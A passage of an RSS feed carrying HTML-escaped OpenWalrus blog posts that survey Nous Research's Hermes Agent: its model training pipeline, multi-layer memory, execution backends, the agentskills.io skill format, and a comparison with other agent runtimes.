&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does the closed learning loop actually compound?&lt;/strong&gt; No published benchmarks measure skill reuse rates or user model accuracy over time. The architecture is sound — does it work after 500 sessions?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What triggers skill creation?&lt;/strong&gt; The complexity threshold is undocumented. Without knowing when the agent will or won't create a skill, developers can't rely on skill accumulation as a feature.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Can five layers stay consistent?&lt;/strong&gt; A skill says "use yarn." The user tells the agent "I switched to pnpm." The FTS5 index has sessions using both. Does the agent reconcile these, or does it depend on which layer it queries first?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does Honcho user modeling measurably improve task performance?&lt;/strong&gt; Dialectical reasoning is a novel approach. But the value proposition — "the agent understands you better over time" — needs evidence. A/B test results, task completion rate comparisons, anything quantitative.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What happens after six months of heavy use with no forgetting?&lt;/strong&gt; Skills accumulate, FTS5 grows, Honcho representations multiply. At what point does the noise outweigh the signal? Does retrieval quality degrade as the corpus grows?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt; — MIT license, 6K+ stars&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt; — user modeling library from Plastic Labs (&lt;a href="https://docs.honcho.to/" rel="noopener noreferrer"&gt;docs&lt;/a&gt;, &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io specification&lt;/a&gt; — portable skill format&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 technical report&lt;/a&gt; — training pipeline and function calling&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 technical report&lt;/a&gt; — hybrid reasoning and DataForge&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.plasticlabs.ai/blog/Honcho-3" rel="noopener noreferrer"&gt;Honcho 3.0 release&lt;/a&gt; — performance improvements and embedding reuse&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/hermes-memory-system" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Hermes Agent: what Nous Research built</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:50:40 +0000</pubDate>
      <link>https://forem.com/crabtalk/hermes-agent-what-nous-research-built-m5b</link>
      <guid>https://forem.com/crabtalk/hermes-agent-what-nous-research-built-m5b</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (v0.0.7):&lt;/strong&gt; The comparison table in this post lists walrus as having "built-in" local inference. As of v0.0.7, local inference was removed — OpenWalrus now connects to remote providers only. Memory and search are now external WHS services.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In February 2026, Nous Research released &lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent&lt;/a&gt; — an open-source (MIT), Python-based agent runtime with persistent memory, autonomous skill creation, and local inference support via Ollama, vLLM, or llama.cpp. It positions itself "between a Claude Code style CLI and an OpenClaw style messaging platform agent." Six thousand GitHub stars in the first month.&lt;/p&gt;

&lt;p&gt;We dug into how it actually works: the training pipeline that produces its models, the multi-level memory system that lets it learn across sessions, and the agentskills.io standard that makes its skills portable to 11+ other tools. Here's what we found.&lt;/p&gt;

&lt;h2&gt;
  
  
  The model stack
&lt;/h2&gt;

&lt;p&gt;Hermes Agent runs on Hermes 3 and Hermes 4, a family of fine-tuned open-weight models from Nous Research. The models and the agent runtime are separate projects — Hermes Agent can use any OpenAI-compatible endpoint, but the Hermes models are purpose-built for agentic workloads.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hermes 3 (August 2024)
&lt;/h3&gt;

&lt;p&gt;Fine-tuned on &lt;a href="https://llama.meta.com/" rel="noopener noreferrer"&gt;Llama 3.1&lt;/a&gt; at three scales: 8B, 70B, and 405B parameters. The &lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;technical report&lt;/a&gt; details the training:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Data&lt;/strong&gt;: ~390M tokens of synthetically generated responses (not human feedback). 69% output tokens, 31% instruction tokens. Constructed March–August 2024.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Training&lt;/strong&gt;: Two-phase — supervised fine-tuning (SFT) followed by direct preference optimization (DPO).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Packing&lt;/strong&gt;: 96% sample packing efficiency at 8192-token sequences via Flash Attention 2 with attention masking to prevent cross-sample contamination.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Format&lt;/strong&gt;: ChatML (&lt;code&gt;&amp;lt;|im_start|&amp;gt;&lt;/code&gt; / &lt;code&gt;&amp;lt;|im_end|&amp;gt;&lt;/code&gt; delimiters) for OpenAI API compatibility.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Function calling&lt;/strong&gt;: Trained on the &lt;a href="https://huggingface.co/datasets/NousResearch/hermes-function-calling-v1" rel="noopener noreferrer"&gt;hermes-function-calling-v1&lt;/a&gt; dataset — single and multi-turn function calling, structured JSON outputs, agentic scenarios. Tools specified in &lt;code&gt;&amp;lt;tools&amp;gt;&lt;/code&gt; XML tags, invoked via JSON with &lt;code&gt;arguments&lt;/code&gt; and &lt;code&gt;name&lt;/code&gt; fields.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The predecessor model (Hermes 2 Pro) achieved 90% function calling accuracy compared to 60–70% for general-purpose models of similar size. Hermes 3 improved on this across multiple benchmarks while adding enhanced code generation and multi-turn conversation handling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hermes 4 (August 2025)
&lt;/h3&gt;

&lt;p&gt;A significant jump. The &lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;technical report&lt;/a&gt; documents two major innovations:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hybrid reasoning&lt;/strong&gt;: Models toggle between standard responses and explicit deliberation using &lt;code&gt;&amp;lt;think&amp;gt;...&amp;lt;/think&amp;gt;&lt;/code&gt; tags. Thinking traces can extend up to 16,000 tokens. Users choose whether they want fast answers or detailed reasoning — the model adapts rather than always defaulting to verbose chain-of-thought.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DataForge&lt;/strong&gt;: A graph-based synthetic data generation system that replaced the manual curation pipeline. Each node in a DAG performs a struct-to-struct transformation — converting simple seed data into complex training formats (e.g., Wikipedia article → rap song → Q&amp;amp;A pair). An LLM judge evaluates outputs on coherence, relevance, complexity, style, and tone, iterating until the sample passes or hits a maximum retry count.&lt;/p&gt;

&lt;p&gt;The numbers tell the scaling story: Hermes 3 used 1M samples and 1.2B tokens. Hermes 4 uses ~5M samples and ~60B tokens — 5x more samples, 50x more tokens. Of those 5M samples, 3.5M are reasoning-heavy (intentionally longer) and 1.6M are non-reasoning.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Hermes 4.3 (36B)&lt;/strong&gt; is particularly interesting: it's fine-tuned on &lt;a href="https://github.com/bytedance-seed/seed" rel="noopener noreferrer"&gt;ByteDance Seed 36B&lt;/a&gt;, not Llama. This breaks the assumption that all Hermes models share a Llama backbone. It achieves a 78.4% reduction in overlong reasoning generation on AIME'24 with only a 4.7% accuracy cost — solving the "model thinks for too long" problem that plagues many reasoning models.&lt;/p&gt;

&lt;h3&gt;
  
  
  Atropos
&lt;/h3&gt;

&lt;p&gt;The training uses &lt;a href="https://github.com/NousResearch/atropos" rel="noopener noreferrer"&gt;Atropos&lt;/a&gt;, Nous Research's distributed reinforcement learning framework. It's not standard RLHF — it's a rollout handler that manages asynchronous coordination across potentially thousands of distributed workers, addressing the challenge of highly variable LLM generation times. In Hermes 4 training, Atropos drives rejection sampling across ~1,000 task-specific verifiers to filter for high-quality reasoning trajectories.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Agent architecture
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The ReAct loop
&lt;/h3&gt;

&lt;p&gt;Hermes Agent implements the classic &lt;a href="https://arxiv.org/abs/2210.03629" rel="noopener noreferrer"&gt;ReAct pattern&lt;/a&gt;: Observation (read terminal output, file contents) → Reasoning (analyze state against goals) → Action (execute commands, call tools) → Loop. The innovation isn't the loop itself — it's what surrounds it.&lt;/p&gt;
&lt;h3&gt;
  
  
  Multi-level memory
&lt;/h3&gt;

&lt;p&gt;Five layers of persistence, from ephemeral to permanent:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Short-term inference memory&lt;/strong&gt;: Standard transformer context within a single session. Nothing survives restart.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Procedural skill documents&lt;/strong&gt;: Persistent markdown files (SKILL.md) capturing step-by-step solutions to completed tasks. Created autonomously when the agent finishes something complex — debugging a microservice, optimizing a pipeline. Unlike standard RAG (which retrieves disjointed snippets), skills maintain cohesive procedural understanding.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contextual persistence&lt;/strong&gt;: Searchable vector store indexing skill documents for workflow retrieval. When a new task resembles a past task, the relevant skill is retrieved and used as a starting scaffold.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User modeling via &lt;a href="https://honcho.dev/" rel="noopener noreferrer"&gt;Honcho&lt;/a&gt;&lt;/strong&gt;: An entity-centric memory library from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt;. Represents both users and agents as "peers." Asynchronously reasons about peer psychology from messages, deriving facts and storing them in reserved collections. No messages = no reasoning = no memory. The model evolves over time: preferences, work patterns, domain expertise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full-text search (FTS5)&lt;/strong&gt;: SQLite-based searchable database of all past interactions with LLM-powered summarization. Cross-session recall for "what did I do last Tuesday?" queries.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The closed learning loop ties these together: the agent completes tasks → creates skill documents → skills improve during subsequent use → periodic nudges prompt the agent to persist valuable knowledge → FTS5 enables cross-session recall → Honcho builds an evolving model of the user. Each session makes the next one better.&lt;/p&gt;

&lt;p&gt;This is a different philosophy from walrus's graph-based memory (LanceDB + lance-graph with Agent/User/Episode nodes). Hermes leans on procedural knowledge (skill docs) and user modeling (Honcho). Walrus leans on relational knowledge (graph traversal) and episode replay. Both aim for the same outcome — agents that remember — but the representations differ. We explored these tradeoffs in &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory research&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Six terminal backends
&lt;/h2&gt;

&lt;p&gt;Hermes Agent separates the agent runtime from the execution environment. Six backends implement a common &lt;code&gt;BaseEnvironment&lt;/code&gt; interface:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Backend&lt;/th&gt;
&lt;th&gt;Use case&lt;/th&gt;
&lt;th&gt;Key feature&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Local&lt;/td&gt;
&lt;td&gt;Development, personal use&lt;/td&gt;
&lt;td&gt;Direct system execution, no isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Production, security-sensitive&lt;/td&gt;
&lt;td&gt;Read-only root filesystem, dropped capabilities, PID limits, namespace isolation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Remote servers&lt;/td&gt;
&lt;td&gt;Persistent environment across sessions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daytona&lt;/td&gt;
&lt;td&gt;Cloud development&lt;/td&gt;
&lt;td&gt;Serverless dev environments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Singularity&lt;/td&gt;
&lt;td&gt;HPC, research clusters&lt;/td&gt;
&lt;td&gt;Container orchestration for compute-heavy workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modal&lt;/td&gt;
&lt;td&gt;Serverless production&lt;/td&gt;
&lt;td&gt;Hibernates when idle, wakes on demand, near-zero cost between sessions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Configuration is a single line in &lt;code&gt;~/.hermes/config.yaml&lt;/code&gt;: &lt;code&gt;backend: modal&lt;/code&gt;. The agent code doesn't change — only the execution surface.&lt;/p&gt;

&lt;p&gt;MCP (Model Context Protocol) support is built in. The client connects at startup, discovers tools from configured servers, and registers them as first-class tools. Automatic reconnection uses exponential backoff (1s → 2s → 4s → 8s → 16s, max 5 attempts). Both stdio-based (local subprocesses) and HTTP-based (remote StreamableHTTP) servers are supported.&lt;/p&gt;
&lt;h2&gt;
  
  
  The agentskills.io standard
&lt;/h2&gt;

&lt;p&gt;The most consequential part of Hermes Agent might not be the agent itself — it's the &lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io&lt;/a&gt; standard it follows for portable skills.&lt;/p&gt;

&lt;p&gt;A skill is a directory containing a SKILL.md file with YAML frontmatter and markdown instructions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;deploy-to-production&lt;/span&gt;
&lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Safely deploy the current branch to production with rollback support&lt;/span&gt;
&lt;span class="na"&gt;license&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Apache-2.0&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;

&lt;span class="c1"&gt;## Steps&lt;/span&gt;

&lt;span class="s"&gt;1. Run the test suite and verify all tests pass&lt;/span&gt;
&lt;span class="s"&gt;2. Create a tagged release from the current branch&lt;/span&gt;
&lt;span class="s"&gt;3. Deploy using the project's deploy script&lt;/span&gt;
&lt;span class="s"&gt;4. Verify the deployment health check endpoint&lt;/span&gt;
&lt;span class="s"&gt;5. If health check fails, trigger automatic rollback&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The standard specifies minimal required fields (&lt;code&gt;name&lt;/code&gt;, &lt;code&gt;description&lt;/code&gt;), optional metadata, and an unrestricted markdown body (recommended under 5,000 tokens). Optional directories (&lt;code&gt;scripts/&lt;/code&gt;, &lt;code&gt;references/&lt;/code&gt;, &lt;code&gt;assets/&lt;/code&gt;) support more complex skills.&lt;/p&gt;

&lt;p&gt;What makes this significant: &lt;strong&gt;11+ tools have adopted agentskills.io&lt;/strong&gt; — Claude Code, Cursor, GitHub Copilot, Gemini CLI, VS Code, Amp, Goose, Roo Code, Kiro, Codex, and OpenCode. A skill written for Hermes Agent works in Claude Code. A skill written for Cursor works in Hermes Agent. This is rare in the agent ecosystem — most skill/plugin systems are framework-specific.&lt;/p&gt;

&lt;p&gt;Walrus's approach is different: markdown skill files with YAML frontmatter and tag-based lookup across three tiers (builtin, user, project). The format is similar in spirit (markdown + metadata), but walrus skills are designed for the walrus runtime specifically, not for cross-framework portability. Whether agentskills.io becomes the universal standard or fragments into vendor-specific extensions is an open question — we discussed this in the context of our &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;skills design philosophy&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
| | Hermes Agent | Claude Code | OpenClaw | Walrus |&lt;br&gt;
|---|---|---|---|---|&lt;br&gt;
| Language | Python | TypeScript | TypeScript | Rust |&lt;br&gt;
| Local inference | Ollama, vLLM, llama.cpp | No | No | Built-in |&lt;br&gt;
| Memory | 5-level (FTS5, vector, Honcho, skills) | Session-based | Session-based | Graph + vector (LanceDB) |&lt;br&gt;
| Skills | agentskills.io (11+ tools) | agentskills.io | Custom | Markdown + tags |&lt;br&gt;
| Setup | pip + model server | Subscription + IDE | npm + API keys | Single binary |&lt;br&gt;
| Backends | 6 (local, Docker, SSH, serverless) | IDE-embedded | Cloud gateway | Local process |&lt;br&gt;
| Messaging | Telegram, Discord, Slack, WhatsApp, Signal | N/A | 20+ platforms | Telegram, Discord |&lt;br&gt;
| Stars | 6.1K | N/A | 247K | Early stage |&lt;br&gt;
| License | MIT | Proprietary | MIT | MIT |&lt;/p&gt;

&lt;p&gt;The architectural divide is clear. Hermes Agent gives you the most flexibility: six execution backends, five memory layers, broad messaging support, portable skills. The cost is setup complexity — Python runtime, a separate model server (Ollama/vLLM), configuration files, and dependency management.&lt;/p&gt;

&lt;p&gt;Walrus takes the opposite bet: one binary, built-in inference, zero external dependencies. Less flexibility, but the &lt;code&gt;curl | sh&lt;/code&gt; to running-agent path is measured in seconds, not minutes. As we explored in &lt;a href="https://openwalrus.xyz/blog/agent-calling-patterns" rel="noopener noreferrer"&gt;how agents call agents&lt;/a&gt;, the framework's architectural choices cascade into everything from &lt;a href="https://openwalrus.xyz/blog/agent-loop-prevention" rel="noopener noreferrer"&gt;loop prevention&lt;/a&gt; to deployment patterns.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 technical report&lt;/a&gt; demonstrates that the 405B variant achieves state-of-the-art performance among open-weight models on several benchmarks. The function calling fine-tuning is particularly effective — the earlier Hermes 2 Pro achieved 90% accuracy compared to 60–70% for general-purpose models, a gap that Hermes 3 widened further.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 report&lt;/a&gt; introduces the hybrid reasoning approach and validates it empirically: 78.4% reduction in overlong generation on AIME'24 with minimal accuracy cost. The DataForge pipeline's 60B-token synthetic dataset represents a bet that quantity and diversity of synthetic data, filtered by task-specific verifiers, outperforms smaller curated datasets.&lt;/p&gt;

&lt;p&gt;A &lt;a href="https://render.com/blog/ai-coding-agents-benchmark" rel="noopener noreferrer"&gt;Render blog benchmark&lt;/a&gt; provides a striking finding: the same underlying model (Opus 4.5) achieves a 17-problem difference on SWE-bench depending on the agent scaffolding. Architecture matters more than model selection. This validates both Hermes Agent's investment in its ReAct loop + memory system and walrus's focus on runtime architecture — the model is necessary but not sufficient.&lt;/p&gt;

&lt;p&gt;Honcho's user modeling approach (from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt;) represents an underexplored direction. Most agent memory systems focus on what the agent did (episodes, tool calls, outputs). Honcho focuses on who the user is — preferences, work patterns, domain expertise. Whether this produces meaningfully better agent behavior over time, or just accumulates an increasingly stale user profile, is an open empirical question.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Does agentskills.io become the POSIX of agent skills?&lt;/strong&gt; Eleven tools adopting the same standard is remarkable, but standardization has a history of fragmenting under pressure. When vendors need features the standard doesn't support (authentication, versioning, dependency management), do they extend agentskills.io or fork it? The SKILL.md format is deliberately minimal — which makes adoption easy but may make evolution hard.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is Python + Ollama the right stack for local-first?&lt;/strong&gt; Hermes Agent requires a Python runtime, a separate model server process, and configuration. This works for developers already in the Python ecosystem, but it's friction for anyone who isn't. A single binary that includes the inference engine (walrus's approach) removes an entire category of "it works on my machine" problems. The question is whether the flexibility of separate components outweighs the simplicity of a monolith.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can autonomous skill creation actually compound?&lt;/strong&gt; Hermes Agent's learning loop — complete tasks, create skills, improve skills during use — is the most ambitious memory system we've surveyed. But skills accumulate. Do old skills become stale? Do conflicting skills create confusion? Is there a pruning mechanism, or does the vector store grow unbounded? The agentskills.io standard says nothing about skill lifecycle management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does Honcho's user modeling outperform graph memory?&lt;/strong&gt; Hermes models users as entities with derived facts. Walrus models relationships as graph edges with episode nodes. Both are persistent, both evolve. But they make different retrieval tradeoffs: Honcho retrieves user context ("this user prefers TypeScript"), walrus retrieves relational context ("last time this user asked about deployment, the agent used this approach"). Which produces better agent behavior at the 100-session mark?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DataForge's synthetic data pipeline: quantity vs quality?&lt;/strong&gt; Hermes 3 used 390M tokens of curated data. Hermes 4 uses 60B tokens of DataForge-generated data — a 150x increase. The LLM judge provides quality filtering, but synthetic data can amplify biases present in the seed data. Does 60B tokens of synthetic data actually produce a better agent than 390M tokens of carefully curated data? The Hermes 4 benchmarks suggest yes, but the comparison isn't clean — the base model also changed (Llama 3.1 → ByteDance Seed).&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent — GitHub&lt;/a&gt; — source code and documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://hermes-agent.nousresearch.com/docs/" rel="noopener noreferrer"&gt;Hermes Agent Documentation&lt;/a&gt; — official setup and usage guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 Technical Report (arXiv:2408.11857)&lt;/a&gt; — training methodology and benchmarks&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 Technical Report (arXiv:2508.18255)&lt;/a&gt; — hybrid reasoning and DataForge&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/atropos" rel="noopener noreferrer"&gt;Atropos — GitHub&lt;/a&gt; — distributed RL framework&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/Hermes-Function-Calling" rel="noopener noreferrer"&gt;Hermes Function Calling — GitHub&lt;/a&gt; — function calling dataset and examples&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io Specification&lt;/a&gt; — portable skill standard&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Honcho — GitHub&lt;/a&gt; — entity-centric user modeling&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://render.com/blog/ai-coding-agents-benchmark" rel="noopener noreferrer"&gt;Scaffolding Matters: SWE-bench Agent Benchmark (Render)&lt;/a&gt; — same model, different architecture, different results&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
  </channel>
</rss>
